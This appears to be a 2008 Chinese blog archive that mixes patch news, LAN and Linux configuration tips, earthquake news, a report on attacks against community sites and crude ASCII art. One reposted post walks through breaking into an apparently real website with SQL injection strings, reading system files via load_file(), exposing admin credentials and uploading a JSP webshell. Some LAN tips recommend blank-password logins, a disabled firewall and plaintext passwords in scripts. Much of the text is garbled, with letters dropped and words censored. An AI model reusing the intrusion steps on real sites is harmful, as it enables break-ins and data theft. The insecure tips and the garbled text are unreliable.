MS08-049公告(重要)用于修复Windows Event System当中存在的两个执行代码漏洞。本地登录可导致这一漏洞被黑客利用。MS08-050公告(重要)修复Windows XP和Windows Server 2003系统的Windows Me enger中存在的信息泄漏隐患。Windows Live Me enger不受影响。MS08-051公告(PowerPoint 2000用户为“危急”级别,更高版本的PowerPoint用户为“重要级别”)修复微软PowerPoint 2000、PowerPoint 2002、PowerPoint 2003和PowerPoint Viewer 2003当中存在的3个
除了***微软于本月发布的这些安全补丁之外,简森·米勒还敦促IT管理员确保***了微软于上月发布的DNS补丁。米勒说:“DNS
正在被广泛利用。”
( Thu, 14 Aug 2008 18:04:32 +0800 )
Description:
1.去掉无关的选项
在Windows XP中,双击“控制面板”中的“文件夹选项”,再单击“查看”标签,然后将鼠标指针滚动至窗口的最下方,可以看到有一个“自动搜索网络文件夹和打印机”项,默认是选中的,将它去掉。这样,当我们打印时,Windows XP不会自作主张去寻找局域网上的打印机并***驱动程序,以防止不经意将机密文档打到别的部门打印机上而自己却还找不到。同时,将此项去掉后,当我们通过“网上邻居”来访问局域网电脑时,它不会自动查找其上的共享文件夹,这样才会提升一些速度。
2.将网卡调至全速
按下Win+Pause/Break键,单击“硬件”标签,再单击“设备管理器”从而打开“设备管理器”,双击“网络适合器”下相应网卡,在打开窗口中单击“高级”标签,选中Link Speed/Duplex Mode(连接速度/双工模式),再在其下选择100 Full Mode.这样可以让网卡调至全速。当然,如果你使用的是无线网络,则将其调至最高速即可,如图3,则是笔者的无线网卡D-Link AirPlus XtremeG+ DWL-G650+ Wirele Cardbus Adapter #2,笔者将其Desired Basic Rate Set(基本速率)设置为Up to 54M .
3.去掉无关的协议
打开“网络连接”窗口,右击“本地连接”,选择“属性”,然后在打开窗口中将不需要的协议去掉。如果你使用Windows 98,则“TCP/IP -拨号适配器”、“Microsoft友好登录”、“Microsoft虚拟专用网络适配器”、“IPX/SPX兼容协议”等都可以去掉,因为这些组件平时不怎么用到,如果选中它们的话,反而会影响工作站正常上网和浏览。
4.设置空密码登录
如果电脑上没有保存敏感数据,只是放一些公共的资源,那可以设置空密码登录。这样用户就不需要提供密码就能够直接进入,可以省却告诉别人密码的时间,也更加方便。
按下Win+R,输入gpedit.msc,打开“组策略编辑器”,找到“计算机配置”→“Windows设置”→“安全设置”→“本地策略”→“安全选项”,再双击右侧窗口中的“帐户: 使用空白密码的本地帐户只允许进行控制台登录”,在打开窗口中将其设置为“已禁用”。
接下来,在此机器上打开“资源管理器”,再选择“工具”→“文件夹选项”,单击“查看”标签,然后取消“去除简单文件共享(推荐)”前的小钩。
5.自动登录局域网
如果你每天都需要访问某个共享文件夹,不需要按部就班地双击“网上邻居”,然后找到服务器,双击后输入用户名和密码再访问。比如,你要访问一个名为server的电脑,用户名为user,密码是8888.则只要写一个bat文件,在其中输入如下语句:net use serverIPC$ "8888" /user:"user",接着把该bat文件拖放到“开始→程序→启动”组中,这样一开机,系统就会以user为用户名,8888为密码登录server电脑,这样你在任何地方访问它上面的共享文件夹则无需再输入用户名和密码了。
如果你使用Windows XP,则可以在第一次打开共享电脑时,输入用户名和密码后,选中“记住我的密码”复选项,下次访问时将不会再向我们索取密码。
6.取消防火墙
如果你启用了Windows XP中防火墙,且共享了驱动器,那有可能别人无法在“网络邻居”中浏览共享驱动器,这时可以右击“本地连接”,选择“属性”,再单击“高级”标签,单击“配置”按钮,在打开的窗口中选中“关闭(不推荐)”项即可。因为我们的局域网电脑本身就接在路由器上,可以考虑在上面设置防火墙。这样局域网内的机器不会受到外界的攻击,但是局域网内的机器访问也会快一些。
7.多系统相互快速访问
如果你发现Windows 2000机器访问98机器特别慢,可以在2000机器上按下Win+R,输入“regedt32”,在“注册表编辑器”中找到[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionExplorerRemoteComputerNameSpace],在该分支下找到并删除掉键,以后双击98同事的机器将会很快。
8.快速备份/更新数据
如果你经常需要将数据备份到局域网内的某文件服务器上,是不是再在本地硬盘上选中文件,然后切换到文件服务器上粘贴?这样就太麻烦了。事实上,我们只要知道文件服务器的名字(如file_bck),并知道其用户名(如user)和密码(如123456),则可以现在我们只要运行一个批处理文件就可以了,此批处理文件内容如下:
set source=d:work
set dest=file_bckbackup
net use file_bckIPC$ "1234" /user:"user"
xcopy %source% %dest% /e /v /r /y /z
将其保存为batchcopy.bat,以后只要双击此bat文件将会将d:work所有文件备份到file_bckbackup下。
9.快速映射盘符
打开共享机器的根文件夹,如homepc,再选中相应的文件夹,右击,选择“映射网络驱动器”命令,即可立即把该文件夹映射成盘符。如果直接选择“工具→映射网络驱动器”则需要我们选择映射路径。
10.取消不用的网络驱动器
如果你映射了网络驱动器,日后不再使用了,请务必打开“资源管理器”,再单击“工具”→“断开网络驱动器”命令,然后在如图13所示的窗口中取消相应的驱动器即可。否则每次开机时就会自动映射此盘,也会占用较多的系统资源,从而让局域网访问速度变慢。
11.考虑快捷方式访问共享文件夹
如果你经常要访问某个用户的共享文件夹,如homepcwritingsoft,那可以在“资源管理器”中打开homepcwritingsoft,然后用鼠标拖动地址栏中的文件夹图标到桌面上,等光标变为链接状时松开。以后,要访问此文件夹,只要直接双击桌面的快捷方式即可,无需从“网上邻居”中逐层进入。
12.直接键入电脑名称
在“资源管理器”的地址栏中直接输入你想连接到的共享文件夹所在的计算机或者该共享文件夹的网络路径可以快速访问。如输入comp(其中comp就是计算机名称),就进入名称为comp的这台计算机,可以查看它的共享文件夹或文件。输入com hare,则会进入comp计算机的share共享文件夹中。 13.直接IP访问
如果你将某个共享电脑的网卡IP固定下来,则可以在“运行”窗口中直接输入电脑IP来访问此电脑,无需从“网上邻居”一层一层地打开。
14.在Total Commander下快速访问
在Total Commander中打开某共享文件夹后,双击其窗格,会弹出窗口,选择“添加当前文件夹”可以将其添加到文件夹列表中。如果以后要访问,只要双击窗格,再选择相应的项目即可快速到达。
15.动态/静态IP两相宜
如果在公司使用DHCP,而在家使用固定IP,那重复地修改网卡IP地址是一件很令人头疼的事情。如果你***Windows XP,则可以让网卡同时拥有动态/静态IP:双击“控制面板”中的“网络连接”图标,再右击相应的网卡,如“无线网络连接”,选择“属性”命令,再在打开窗口中选中“Internet协议(TCP/IP)”项,单击下方的“属性”按钮。并在再次打开的窗口中选中“自动获得IP地址”和“自动获得DNS服务器地址”项。再单击“备用配置”标签,然后在打开窗口中选中“用户配置”项,再在其中输入固定IP地址、子网掩码、默认网关、首选DNS服务器地址,如192.168.0.188、255.255.255.0、192.168.0.。这样,当我们的电脑发现有DHCP存在,就会从DHCP服务器上获得IP地址。否则就会使用我们设置的固定IP、子网掩码、默认网关、首选DNS服务器地址等,如上为192.168.0.188等,非常方便。
16.取消缓存设置
在电脑上右击某文件夹,选择“共享和安全”时,单击窗口下方的“缓存”按钮,再在打开的窗口取消“允许在这个共享文件夹中缓存文件”项。这样当我们的共享文件夹下的文件非常多时,别人访问此共享文件夹加速会明显。如果不这样设置,可能很长时间无法打开此文件夹下的文件,而且有可能会让系统死机。
17.可以考虑千兆网卡和64位电脑
千兆网卡和64位的电脑,并***64位Windows,据权威机构测试,它的局域网速度访问速度有明显的提升。
18.将无线AP/路由器放在屋子的中间
无线AP/路由器是无线网的中心,因此请一定要把它放屋子的中间,这样保证家里的所有网卡能够更好地连接上它。有不少人因为小区宽带只接到门口到客厅,就将无线AP/路由器接在那些位置,这样做,你的无线信号会损失很多,自然网速提不上去。 19.打开无线的54M 模式
有的无线AP/路由器为了与更多的网卡“兼容”,并没有打开它的G模式,此时要登录到AP/路由器(一般地址为
),将其“无线模式”设置为G mode(G模式),将“传输 (TX) 率”设置为54M ,激活8X 模式,并将“天线传输功率”设置到最高。
我们最好不要使用Windows XP的无线管理,而是***网卡自带的程序,这样设置时,会有更多的选项,显示的是笔者网卡自带程序的设置项,里面就有相应的8X 模式,并可以强制为54M 方式,这些功能Windows XP中通用无线管理驱动都不具有。
要注意的是,强制为54M 后,在一些PCMCIA插槽的无线网卡上可能会出现连不上无线AP/路由器的现象,这时只有将AP/路由器改回mixed mode(混合模式)。
20.更换信道
在无线AP/路由器中,我们可以更改信道。对于802.11g来说,有11个信道可用,但是完全不干扰的只有1、5、11三个,也就是说同一个区域使用三个以上的802.11g无线网络就会相互干扰,信道之间的重叠会使数据链接速率下降。因此,不管我们的邻居有没有***802.11g无线网络,还是将其更换为以上三个信道中的一个,可能也会给网络的速度和稳定带来一些帮助。
21.无线/有线混用
现在购买的无线AP/路由器上一般都会有4个有线网线的接口,你把数据访问量大的机器通过有线网卡和网线将它接在无线AP/路由器的有线接口上,同时将有线网的IP地址记住。这样,你在别的房间里在用无线网卡的机器上按下Win+R,输入有线网卡的IP地址来访问电脑时速度将会快出很多!无线网卡与有线网卡之间传输起来速率非常慢!
( Thu, 14 Aug 2008 17:59:58 +0800 )
Description:
众所周知,网络安全是一个非常重要的课题,而服务器是网络安全中最关键的环节。Linux被认为是一个比较安全的Internet服务器,作为一种开放源代码操作系统,一旦Linux系统中发现有安全
,Internet上来自世界各地的志愿者会踊跃修补它。
然而,系统管理员往往不能及时地得到信息并进行更正,这就给
以可乘之机。相对于这些系统本身的安全
,更多的安全问题是由不当的配置造成的,可以通过适当的配置来防止。下面就简单列出以下几点,以供大家参考:
1、用防火墙关闭不须要的任何端口,别人PING不到服务器,威胁自然减少了一大半
防止别人ping的方法:
1)命令提示符下打
echo 1 /proc/sys/net/ipv4/icmp_ignore_all
2)用防火墙禁止(或丢弃)icmp 包
iptables -A INPUT -p icmp -j DROP
3)对所有用ICMP通讯的包不予响应
比如PING TRACERT
2、更改SSH端口,最好改为10000以上,别人扫描到端口的机率也会下降
vi /etc/ h/ hd_config
将PORT改为1000以上端口
同时,创建一个普通登录用户,并取消直接root登录
useradd 'username'
pa wd 'username'
vi /etc/ h/ hd_config
在最后添加如下一句:
PermitRootLogin no #取消root直接远程登录
3、删除系统臃肿多余的账号:
userdel adm userdel lp userdel sync userdel shutdown userdel halt userdel news userdel uucp userdel operator userdel games userdel gopher userdel ftp 如果你不允许匿名FTP,就删掉这个用户帐号 groupdel adm groupdel lp groupdel news groupdel uucp groupdel games groupdel dip groupdel users
4、更改下列文件权限,使任何人没有更改账户权限:
chattr +i /etc/pa wd chattr +i /etc/shadow chattr +i /etc/group chattr +i /etc/gshadow
5、chmod 600 /etc/xinetd.conf
6、关闭FTP匿名用户登陆
( Thu, 14 Aug 2008 17:58:03 +0800 )
Description:
文章摘自:黑帽安全小组
(forum.bhst.org)
文章作者: skyfire[B.H.S.T]
要点:
à找到注入点;
à暴露网站页面绝对路径;
à利用mysql的load_file()读取网站配置信息找到管理后台;
à上传we hell。
首先是了解一下 Struts和.do :
首先了解一下什么是Struts。Struts是Apache基金会Jakarta项目组的一个Open Source项目,是一种优秀的J2EE MVC架构方式,它利用taglib获得可重用代码和抽象 Java 代码,利用ActionServlet配合Struts-config.xml实现对整个系统导航。增强了开发人员对系统的整体把握,提高了系统的可维护性和可扩充性。
Struts的核心是Controller,即ActionServlet,而ActionServlet的核心就是Struts-config.xml,Struts-config.xml集中了所有页面的导航定义。
关于 truts更加详细的内容可以到以下地址浏览:
复制内容到剪贴板代码:
.do文件是一个网页后台程序,它实际不是一个文件,并没有一个真正的.do文件存在,它不能直接打开 ,struts使用一个特殊的servlet作为“交换机”,将来自web浏览器的请求转到相应的serverpage。在开发web应用时有一个必须要写的部署描述文件(web-inf/web.xml)。这个文件描述了你的web应用的配置,包括欢迎页面(welcome pages)(当请求没有指定时,出现在目录下的文件)、servlet(路径或者扩展名)和那些servlets的参数的映射。在这个文件中,你配置struts actio ervlet作为一个操控所有指定映射(通常以.do为扩展名)请求的servlet——这就是“交换机”。
可以通过下面地址的内容更加清楚的明白.do文件:
复制内容到剪贴板代码:
访问xx.do页面实际就是访问xx.j 文件,但是使用了struts技术的网站,直接访问xx.j 是不会被Tomcat、Resin等web服务器解析的。
xx.do页面目录下必有web-inf文件夹,存放Struts-config.xml!!
下面开始转入主题:
1、打开目标站点,发现是j 类型网站,页面后缀名称是.do和.j ,
打开页面
,输入标点 ',根据页面返回的内容,发现网站是基于Apache Tomcat/5.0.28 的web服务器。
2、寻找注入点,打开“产品中心”-“网络防火墙”-打开一种产品的介绍,
,试试是否能手工注入,根据对此站点的了解,数据库应该是mysql或者oracle,oracle那种大玩意我们就不敢碰了,先试试看是不是mysql,
and ord(mid(version(),1,1))51,页面正常,说明是mysql,而且mysql的版本是4.0以上,可以使用union查询,下面爆一下字段数:
复制内容到剪贴板代码:
and 1=2 union select 1,2/* 页面出错;
and 1=2 union select 1,2,3/* 页面出错;
页面正常,而且页面内容显示出我们想要的数字!!
mysql注入爆字段有个技巧,不需要这么麻烦进行猜测,可以利用order by 暴字段数,例如:
复制内容到剪贴板代码:
order by 7/* 页面正常;
order by
8/* 页面出错,说明共有7个字段
3、既然知道了是mysql数据库,也找到了注入点,当然是拿出php注入工具,这里使用的是海洋顶端网PHP注射工具,获取数据库的一些信息,更加重要的使用load_file()函数。
对于mysql数据库来说,root用户默认只能在本机登陆,就不要指望使用空密码连接3306端口远程登录mysql数据库.
现在还不知道操作系统是windows还是linux,如果系统没有做用户权限设置,可以用load_file()函数试试,load_file(‘/etc/pa word’),load_file(‘c:\boot.ini’),竟然是windows 2000 Server!看来网站架构应该就是windows 2000 server+tomcat+mysql,不要指望IIS了。
4、继续注入,看能不能找到网站管理员帐号和密码。拿出近来比较出风头的注入工具pangolin(穿山甲),输入注入地址
,数据库当然是mysql了,注入字符类型是int型,晕,跑了半天竟然跑不出东西来,数据表也猜测不到东西,看来用工具猜测获得数据库的管理员帐号和密码是不太现实了,再想想其他办法咯。
4、如果知道页面文件在硬盘的绝对路径,当然可以load_file()查看页面源代码,关键是怎么暴露出页面的地址呢?如果是php页面还可以构造一些sql语句导致查询出错而暴露出web页面绝对路径,但现在是tomcat,页面执行出错的时候都是tomcat该死的调试信息霸占住页面。试试啊D注入工具的管理入口搜索,结果发现的只有tomcat的默认管理页面,没有配置过的tomcat管理界面是登陆不了的。继续搜索,无意中打开了
,可以列目录哦,不过看不到什么有价值的页面地址。
5、试试工具wwwscan,一个支持SSL的命令行CGI扫描器,据说收集了很多敏感的目录文件,终于访问
的时候,错误页面暴露出来网站的路径:F:\Tomcat 5.0\weba \ROOT\com3 (系统找不到指定的文件),那说明tomcat的虚拟目录路径就是F:\Tomcat 5.0\weba \ROOT\
)是这样描述此
Apache Tomcat MS-DOS设备名远程拒绝服务
Apache Tomcat在处理畸形的用户请求时存在漏洞,远程攻击者可以利用这个
对服务程序执行拒绝服务攻击,使合法用户无法
正常访问服务。当用户发送MS-DOS设备名加“.j ”的文件请求到服务器时,会导致服务程序发生拒绝服务。
6、既然知道了网站的虚拟路径,那么剩下的就是利用load_file()看页面代码咯。先试试load_file(“index.php”),可惜看不到什么有价值的信息,那么看看tomcat的配置文件, F:\Tomcat 5.0\conf\server.xml,如果网站虚拟目录移动到其他路径不在tomcat***目录下,在server.xml中会有新的虚拟目录信息,但此时没有什么有用的信息。试试F:\Tomcat 5.0\weba \root\web-inf\struts-config.xml,整个站点的页面路径都出来了!
,显示修改管理员密码的页面,不用用户身份验证就可以访问页面也就不说了,更要命的是天上掉下馅饼:html代码里面竟然还可以看见用户帐户和密码!!继续在struts-config.xml找后台管理界面登陆页面,终于发现是后台登陆地址是
9、google搜索并找到一个:JFolder.j ,用网站后台功能上传j ,上传成功,根据网站内其它已上传图片的路径,直接访问
上传文件新名称,得到we hell!!
10、总结:在本次
中,网站存在注入点,然后通过struts-config.xml找到网站的管理后台地址,然后又暴露出管理员的帐号和密码,实属运气,否则还需要花费很大力气去猜解管理表名称以及管理员帐号和密码后才能顺利进入管理后台并上传j 形成we hell,总而言之,网站系统的防护缺陷包括有:网站系统存在注入点、服务器没有进行用户权限设置、网站后台某些管理页面没有进行用户认证、上传页面可以上传任意类型文件。
在wwwscan的扫描结果中已经发现了上传页面,并且能上传任意文件,但是还需要猜解到文件传上去后的路径是img还是dir或者是其它路径然后才能访问到此j 木马,但本次入侵主要还是利用了struts的配置文件struts-config.xml来获得we hell!
( Mon, 19 May 2008 23:10:04 +0800 )
Description: ( Mon, 19 May 2008 23:03:28 +0800 )
Description:
为表达全国各族人民对四川汶川大地震遇难同胞的深切哀悼,国务院决定,2008年5月19日至21日为全国哀悼日,各地举行活动哀悼大地震遇难同胞:
驻外使领馆
中国驻朝日澳等国使领馆下半旗向遇难者志哀
驻美大使馆为汶川地震遇难同胞举行哀悼活动
中国驻意大利使馆为地震罹难者默哀
曾荫权率港府官员哀悼四川地震遇难同胞
香港学校下半旗悼地震遇难者
澳门特区在全国哀悼日下半旗志哀
组图:四川双流机场乘客抱头痛哭
组图:万人聚集天府广场向遇难同胞志哀
***广场下半旗哀悼汶川地震遇难同胞
北京影院所有院线将停映影片三天
上海全城为遇难同胞默哀 逾千商户歇业
上海人民广场下半旗纪念遇难同胞
长沙娱乐场所开始停业 湖南各台电视剧停播3天
武汉连夜部署全国哀悼日活动
拉萨布达拉宫广场为地震遇难同胞降半旗
西安雁北广场喷泉停演三天
组图:山西市民为汶川地震遇难者默哀
组图:天津为地震遇难同胞默哀3分钟
组图:浙江省领导为汶川地震遇难者默哀
杭州降半旗哀悼地震遇难同胞
青海各界集会哀悼遇难同胞
福建各界向地震遇难者默哀
福建大学宿舍熄灯3分钟为遇难者默哀
组图:沈阳全城
( Mon, 19 May 2008 22:53:55 +0800 )
Description:
新华网北京5月19日电(记者周英峰、吴晶晶)截至19日12时,我国四川汶川8级地震已造成四川、甘肃、陕西、重庆、云南、湖北、河南、湖南等省(市)34073人遇难,245108人受伤。
根据国务院抗震救灾总指挥部授权,国务院新闻办19日发布了四川汶川地震抗震救灾最新进展情况。据卫生部报告,目前受伤住院治疗人数累计52934人,已出院7979人,在医院内死亡3304人。据中国地震局报告,截至19日13时,共监测到4级以上余震155次,其中5级以上24次,6级以上4次。
据民政部报告,截至19日13时,全国共接收社会各界捐赠款物108.34亿元,其中捐款89.27亿元,物资折款19.09亿元。截至18日21时,民政部、军队和各地民政部门共向灾区调运救灾帐篷25.4319万顶,棉被72.35万床、棉衣178.36万件,价值3421.5万元的食品和饮用水以及价值18424.01万元的其他物资。
据国家发展改革委报告,宝成铁路109号隧道和广岳支线永兴-雪门寺段仍在全力抢修中。据工业和信息化部报告,至18日20时48分,全部抢通恢复汶川、理县、茂县、青川、平武、黑水、北川7重灾县的对外固定***通信,为抗震救灾提供了有力的通信保障。据电监会报告,截至19日12时,北川县、茂县、卧龙尚未恢复供电。其余受灾县区已基本恢复供电或部分恢复供电。甘肃陇南地区9个县受灾停电。
( Mon, 19 May 2008 22:49:27 +0800 )
Description:
中新网5月19日电 14时28分起,中国全国人民为四川汶川大地震遇难者默哀3分钟。各地汽车、火车、舰船笛声长鸣,防空警报在各城市上空鸣响。
***、吴邦国、温家宝、贾庆林、李长春、习***、贺国强、周永康等领导同志在中南海怀仁堂前肃立默哀3分钟。
全国人大常委会、国务院、全国政协、中央军委有关负责同志同时哀悼。
19日下午2时28分,香港的轮船、火车和非运营状态中的公交车辆同时鸣笛,向四川地震遇难者致哀。行政长官曾荫权率全体***默哀。
北京时间19日14时28分,中国驻外使领馆、驻国际组织代表处、中资机构等举行悼念活动,参加活动全体人员默哀3分钟,沉痛悼念四川汶川大地震遇难者。
为表达全国各族人民对四川汶川大地震遇难同胞的深切哀悼,中国国务院决定,2008年5月19日至21日为全国哀悼日。在此期间,全国和各驻外机构下半旗志哀,停止公共娱乐活动,外交部和中国驻外使领馆设立吊唁簿。5月19日14时28分起,全国人民默哀3分钟,届时汽车、火车、舰船鸣笛,防空警报鸣响。
( Sat, 3 May 2008 20:26:38 +0800 )
Description:
公开较量的同时,境外势力和“藏独”分子也将目标对准了华人网络社区 一个多月来,海内外华人反“藏独”和反西方媒体歪曲报道、支持北京奥运的活动遍及全球。在这场面对面的较量中,活动发起者和响应者大多云集各大华人社区论坛,互联网成为整合华人力量的重要平台。与此同时,“藏独”分子和境外势力也瞄准了华人网站。为达到破坏的目的,他们不惜采用各种方式发起攻击。 “红心中国”网站被篡改 4月19日,MSN“红心中国”发起网站我赛网的技术人员忽然发现,一些IP地址正在恶意访问服务器。而此时,距这家网站发起在 MSN上加注“红心中国”签名不过两天时间,已经有700万网民的MSN“全线飘红”。“那天的(攻击)量不是特别大。”我赛网负责人陈怀远告诉《国际先驱导报》,恶意访问解决起来相对容易,除防火墙拦截外,他们换了服务端口,同时设置了IP限制访问来防范。 但到了第二天,大量的数据包开始涌向服务器,很多用户无法正常登陆,网站页面随后被篡改,“藏独”雪山狮子旗竟堂而皇之地出现在首页,此外还有一些反动标语。“这是一分钟都不能挂的”,没办法,我赛网服务器被迫关闭24小时,在更换机房后才恢复正常。 据陈怀远介绍,这次被攻击的时间点看上去非常巧合:“红心中国”刚刚发起两天,同时也是美国有线电视新闻网(CNN)体育频道网页被篡改的翌日。“我们能查到一部分真实IP(能够做数据返回的IP),其中大部分来自欧洲。” 与陈怀远的烦恼相比,之前本报曾报道过反CNN网站(anti-c .com)遭遇攻击的情况,当时对方采用的是“洪水式攻击”,直接导致超过27个小时网民无法登陆。尽管反CNN网站组织者对攻击源三缄其口,但网民却早已将怀疑对象锁定在“藏独”和一些西方势力身上。 [next] 海外华人网站频遭攻击 境外黑客的目标不仅限于中国国内。海外华人通过网络自发组织的团结行动,也引来黑手的阻挠。4月11日,澳大利亚昆士兰州的中国留学生“飞翔”与几名同伴一起,在阳光澳洲华人社区发起了赴堪培拉声援圣火传递的倡议。按照计划,北京奥运圣火将于4月24日在澳大利亚首都堪培拉举行。但令“飞翔”没想到的是,活动倡议刚刚发出4天,阳光澳洲华人社区和自己的电脑就都成了被黑客攻击的对象。“可能是树大招风吧,好在我的电脑装了两道正版防火墙。”“飞翔”的电脑里有所有参加保护圣火的中国留学生个人信息,包括真实姓名、联系方式、所在学校等等,所幸对方并未得逞。根据防火墙提示的信息,被拦截的IP地址大多来自德国、西班牙等国家和地区。 24日,澳大利亚华人云集堪培拉保护圣火,而从当天起,包括阳光澳洲华人社区、Ozchinese、澳宝在内的多个爱国的华人网站都遭到了黑客攻击,其中很多网站至今无法登陆。“每天凌晨1点左右,都有人攻击阳光澳洲华人社区。”“飞翔”告诉《国际先驱导报》,尽管迄今并未造成任何损失,但网站已开始未雨绸缪。4月27日上午,本报记者登陆该社区,看到的是“正在维护中”的通告。“我们准备从技术和程序上进行升级,以保证安全。”飞翔说。 网友呼吁“保卫论坛” “我们怀疑是‘藏独’所为,特向各位高手紧急求援!”几天前,一名身在悉尼的中国留学生在国内某网站发起了呼吁,郑重请求支援。帖子中称,就在圣火在澳大利亚传递当晚,悉尼的多个华人网站遭到黑客攻击,直到现在都不能打开。同样的一幕,也发生在日本华人网络上。 为了迎接4月26日奥运圣火在日本长野的传递,很多在日中国留学生聚集在著名的小春留学论坛上策划保卫圣火方案,结果却招致“藏独”分子和日本当地部分右翼势力的攻击。一位在东京留学的中国学生发帖说,每天都有人攻击小春论坛,尤其是圣火传递开始前一周,黑客攻击愈演愈烈,导致网友之间很难建立有效的联系,计划中的活动也不得不中断。“虽然技术工作者在努力坚守,但实在无法应付‘鬼子’们组织的一次又一次的攻击。”“我听说了这件事,大概是4月20日左右,他们和我们取得过联系。”全日本中国留学人员联谊会会长李光哲向《国际先驱导报》证实了小春留学论坛被攻击的情况。据介绍,后来该论坛很快就恢复正常了。 ( Sat, 3 May 2008 20:24:39 +0800 )
Description:
--------------------------------------------------------------------------------
◆...................o888888o.o88888888o.
.................8888888888888888888888888o.
...............888::::888888888888888888888888o.
.............88::::::::88888888888888888888888888o.
...........o8:::::::::888::顶88888888888888888888888.
..........8888:8::::::8:::::::::顶888888888888888888888.
.........8888::::8888::::::::::::::::顶88888888888 '88
........8888:::888888888::::::::::::::::顶888888888 8
.......88.88888888888888888:::::::::::::顶88888888888
......88..888888888888888888:::::::::::顶88888888888888
......88.888888888888888888888::::::::顶88888888888888888
......8..8888888888888888888888::::::顶88888888888888888888
........8888888888888888::88888:::::顶8888888888888888888888
......88888888888888888::::8888::::顶8888888888888888 '8888
.....88888888888888888::::8888::::顶:8::***::888888888 888
....88888888888888888::::888:::::顶::::*EYE*::888888888 88
..888888888888888888::::88::::::顶::::::::::::::::::888888888 88
.8888888888888888888::::8::::::顶:::::::::::::::::::顶888888888 88
888...8888888888::::88::::8:::::顶:::8oo8::::::::::88888888888888 8
88...88888888888:::::8:::::::::顶::::::::::::::::::::::88888888888888888
.8..8888888888888::::::::::::顶::"8888888"::::::顶88888888888888888
..8888888888::888:::::::::::顶:::::::"8a8"::::::::::顶88888888888888888888
.888888888:::::88::::::::::顶88::::::::::::::::::::顶88888888888888888888888
8888888888:::::8:::::::::顶88888::::::::::::::顶88888888888888888888888888
888888888:::::8:::::::::顶8888888ooooo顶88888888888888888888888888888
888888.顶::::::::::::::顶8888888888::::::顶8888888888888888 '888888888
8888..顶:::::::::::::::顶88888888888::::::顶8888888888888888 88888888
.888..顶::::::::::::::顶8888888888888:::::::顶888888888888888 888888
..888.顶:::::::::::::顶88888888888888888::::::顶8888888888888 88888
...88.顶:::::::::::::8888:88888888888888888:::::顶顶888888888 8888
...88.顶:::::::::::8888顶::88888::888888888888:::::顶顶88888 888
...8...顶::::::::::8888顶:::8888:::::88888888888:::::::顶顶88 888
.......8顶:::::::8888顶:::::888:::::::::88:::8888888:::::::::顶顶 88
......88顶:::::::8888顶::::::88:::::::::::8:::::888888::::::::::::顶顶 88
.....8888顶:::::888顶:::::::::88:::::::::::::顶::::8888::::::::::::::顶 8
....88888:顶::::888顶::::::::::8:::::::::::::::顶::::888:::::::::::::::::顶
...88.888:顶:::888:顶::::::::::8:::::::::::::::::顶::888::::::::::::::::::::顶
...8.88888顶:::88::顶::::::::::::::::::::::::::::::顶:88::::::::::::::::::::::::顶
.....88888顶:::88::顶:::::::::::::::::::::::::::::::::顶88:::::::::::::::::::::::::顶
.....88888顶:::88::顶:::::::::::::::::::::::::::::::::顶:8::::::::::::::::::::::::::::顶
....888888顶::::8::顶:::::::::::::8888::::::::::::::顶8::::::::::::8888::::::::::顶
....88888..顶:::8::顶顶:::::::::888888::::::::::::顶::::::::::::888888:::::::::顶
....8888...顶顶:::::顶顶::::::::888888::::::::::::顶顶::::::::::888888:::::::::顶
....8888....顶:::::::顶顶::::::::::8888::::::::::::顶顶顶::::::::::8888::::::::::顶'
.....888....顶顶::::::顶顶顶:::::::::::::::::::::::顶顶::顶:::::::::::::::::::::::::顶'
......88.....顶::::::::顶顶顶顶::::::::::::::::顶顶顶::::顶顶::::::::::::::::::::顶'
.......88....顶顶:::::::::顶顶顶顶顶顶顶顶顶顶:::::::::顶顶顶顶顶顶顶顶'
........88....顶顶::::::::::::::顶顶顶顶顶顶顶:::::::::::::::顶顶顶顶顶o'
.........88...8顶顶:::::::::::::::::::::::::::::::::::::::::::::::::::::顶
..........8...88顶顶::::::::::::::::::::::::::::顶:::顶::::::::::::::顶
..............888顶顶::::::::::::::::::::::顶顶::::::顶顶:::::::::顶
.............88888顶顶::::::::::::::::顶顶顶:::::::顶顶:::::::顶
.............888888顶顶::::::::::::::顶顶顶:::::::::顶顶::::顶
............88888888顶顶:::::::::::顶顶顶:::::::::::顶::::顶
...........88.8888888.顶::::::::顶顶顶::::::::::::::顶:::顶
...........8..888888..顶::::::顶顶:::::::::::::::::::顶:::顶
..............888888..顶:::::顶:::::::::::::::::::::顶::顶顶
.............888888...顶::::顶::::::::::::::::::::::::::顶顶
.............888888...顶::::顶:::::::::::::::::::::::::顶:顶
.............88888...顶::::::::::::::8::::::::::::::::::顶::顶
............88888...顶:::::::::::::::88:::::::::::::::::顶::顶
...........88888...顶::::::::::::::::8::::::::::::::::::::顶::顶
..........88888...顶:::::顶:::::::::::::::::::::顶::::::::顶::顶
..........8888...顶:::::顶:::::::::::::::::::::::顶顶::::::顶::顶
.........8888...顶:::::顶:::::::::::::::::::::::顶顶顶:::::::顶:顶
........888....顶:::::顶顶::::::::::::::::::::::顶顶顶::::::::顶:顶
......8888....顶::::::顶顶:::::::::::::::::::::顶顶顶::::::::: 顶:顶
.....888......顶:::::顶:::::::::::::::::::::::::顶顶::::::::::::::顶:顶
..8888......顶:::::::::::::::::::::::::::::::::顶::::::::::::::::::顶:顶
.............顶:::::::::::::::::::::::::::::::::::::::::::::::::::::顶:顶
............顶::::::::顶:::::::::::::::::::::::::::::::::::::::::::::顶:顶
............顶::::::::顶::::::::::::::::::::::顶:::::::::::::::::::::顶:顶
...........顶::::::::::顶::::::::::::::::::::顶::::::::::::::::::::::顶:顶
...........顶:::::::::::顶8:::::::::::::8:顶:::::::::::::::::::::::::顶:顶p
...........顶::::::::::::888hole888顶::::::::::::::::::::::::::::::::顶:顶o
...........顶:::::::::::::88888888顶::::::::::::::::::::::::::::::::顶:顶p
...........顶::::::::::::::888888顶:::::::::::::::::::::::::::::::::顶:顶
...........顶:::::::::::::::88888顶::::::::::::::::::::::::::::::::顶:顶
...........顶:::::::::::::::::88顶:::::::::::::::::::::::::::::::::顶顶
...........顶:::::::::::::::::::顶::::::::::::::::::::::::::::::::顶顶
...........顶:::::::::::::::::::顶:::::::::::::::::::::::::::::::顶顶
............顶:::::::::::::::::顶::::::::::::::::::::::::::::::顶顶
............顶:::::::::::::::::顶::::::::::::::::::::::::::::::顶
.............顶:::::::::::::::顶:::::::::::::::::::::::::::::顶
.............顶:::::::::::::::顶::::::::::::::::::::::::::::顶
..............顶:::::::::::::顶::::::::::::::::::::::::::::顶
..............顶:::::::::::::顶:::::::::::::::::::::::::::顶
...............顶:::::::::::顶:::::::::::::::::::::::::::顶
...............顶:::::::::::顶::::::::::::::::::::::::::顶
